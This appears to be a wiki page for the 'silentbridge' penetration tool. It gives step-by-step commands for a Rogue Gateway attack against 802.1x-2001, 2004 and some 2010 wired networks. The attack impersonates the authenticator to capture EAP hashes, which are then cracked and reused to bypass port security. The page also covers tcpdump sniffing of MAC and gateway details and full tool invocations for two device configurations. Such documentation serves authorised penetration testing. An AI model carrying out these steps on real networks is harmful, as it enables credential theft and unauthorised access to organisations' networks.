-
Notifications
You must be signed in to change notification settings - Fork 40
Rogue Gateway Attack
Effective against: 802.1x-2010 (Device Configuration B only), 802.1x-2004, 802.1x-2001
In a Rogue Gateway attack, the attacker impersonates the authenticator in order to force the supplicant to perform EAP authentication with the attacker. This provides the attacker with a set of hashes that can be cracked to obtain plaintext credentials. These plaintext credentials can then be used to authenticate with the network using the Bait n Switch attack, effectively bypassing port-security without using a bridge.
When used with Device Configuration B, the Rogue Gateway Attack can be used to bypass 802.1x-2010 cases where weak EAP methods are used (note that this has not been tested against MACsec implemented with PSK).
Begin connecting your rogue device between the supplicant and authenticator as described in Device Placement.
Next, connect to your device using your side channel (see: Software Setup).
Next, use the --cert-wizard flag to generate a self-signed certificate:
./silentbridge --cert-wizard
Then, follow the instruction set below that is relevant to your device's configuration:
Begin by performing a classic 802.1x bypass as described in Classic 802.1x Bypass.
Then, use tcpdump to passively sniff the following data points:
- supplicant MAC address
- switch MAC address
- subnet netmask
- gateway IP
Then, use the --rogue-gateway command to perform the rogue gateway attack:
./silentbridge --rogue-gateway --upstream eno1 --client-mac 38:60:77:d0:ef:0b --phy eno2 --switch-mac 00:42:5a:87:57:85 --netmask 255.255.255.0 --gw-ip 192.168.1.1
When finished, hit CTRL+C to terminate the attack. Then use the --bridge-up command to restore the classic 802.1x bypass:
./silentbridge --bridge-up
Begin by using the --splitterctl command to make sure that both splitters are in the "bypass" position:
./silentbridge --splitterctl --upstream-splitter bypass --phy-splitter bypass
Next, use tcpdump to sniff traffic on the interfaces connected to the device's passive tap. Gather the following data points:
- supplicant MAC address
- switch MAC address
- subnet netmask
- gateway IP
Then, use the --rogue-gateway command to perform the rogue gateway attack:
./silentbridge --rogue-gateway --upstream eno1 --client-mac 38:60:77:d0:ef:0b --phy eno2 --switch-mac 00:42:5a:87:57:85 --netmask 255.255.255.0 --gw-ip 192.168.1.1 --use-splitters
When finished, hit CTRL+C to terminate the attack.